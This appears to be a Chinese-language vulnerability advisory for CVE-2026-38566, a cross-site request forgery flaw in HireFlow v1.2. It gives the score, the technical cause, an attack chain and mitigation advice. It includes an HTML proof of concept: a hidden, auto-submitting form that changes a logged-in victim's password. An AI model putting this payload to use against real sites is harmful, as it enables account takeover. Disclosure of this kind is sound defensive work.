CVE-2026-38566 CVSS 8.1 高危

CVE-2026-38566 HireFlow跨站请求伪造漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-38566

漏洞类型

CSRF

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

HireFlow

漏洞概述

HireFlow v1.2版本在所有状态改变的POST端点上未实施CSRF令牌验证机制。受影响的接口包括密码修改、候选人删除、反馈提交以及面试安排等。由于SESSION_COOKIE_SAMESITE属性未正确配置，浏览器级别的防御机制失效。攻击者可诱导已认证用户访问恶意页面，在用户不知情的情况下执行敏感操作，如修改密码、删除记录或注入恶意数据，造成高机密性和完整性风险。

技术细节

该漏洞源于HireFlow v1.2未能遵循OWASP安全规范，未在关键POST请求中包含CSRF Token进行请求来源验证。同时，服务端未设置SESSION_COOKIE_SAMESITE属性，使得Cookie在跨站请求中可被正常发送。攻击者可构造包含恶意HTML表单或JavaScript代码的钓鱼页面，利用受害者的已登录会话自动向目标服务器发送HTTP POST请求。例如，攻击者可以构造一个隐藏的表单，当受害者加载页面时，自动向/profile发送POST请求修改密码，或向/candidates/delete/<id>发送请求删除候选人记录。由于浏览器会自动附带认证Cookie，服务器无法区分请求是否由用户主动发起，从而执行了恶意操作。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用的是HireFlow v1.2，并探测到缺乏CSRF防护的端点。

STEP 2

投递

攻击者构造包含恶意CSRF请求的HTML页面，并通过钓鱼邮件或社会工程学诱导受害者点击链接。

STEP 3

利用

受害者在保持登录状态的情况下访问恶意链接，浏览器自动向HireFlow服务器发送带有认证Cookie的恶意POST请求。

STEP 4

影响

服务器执行请求，导致受害者密码被篡改、数据被删除或被注入虚假数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CSRF Password Change -->
<!-- Save this as an HTML file and host it. When a logged-in user visits, their password changes. -->
<html>
<body>
  <!-- Form targets the password change endpoint -->
  <form action="http://target-site/profile" method="POST">
    <input type="hidden" name="new_password" value="attacker123">
    <input type="hidden" name="confirm_password" value="attacker123">
  </form>
  <script>
    // Auto-submit the form on page load
    document.forms[0].submit();
  </script>
</body>
</html>

影响范围

HireFlow 1.2

防御指南

临时缓解措施

建议管理员在补丁发布前，在Web应用防火墙（WAF）中部署规则，检查HTTP Referer或Origin头以确保请求来自受信任的域名。同时，提醒用户不要在登录系统的情况下点击不明链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表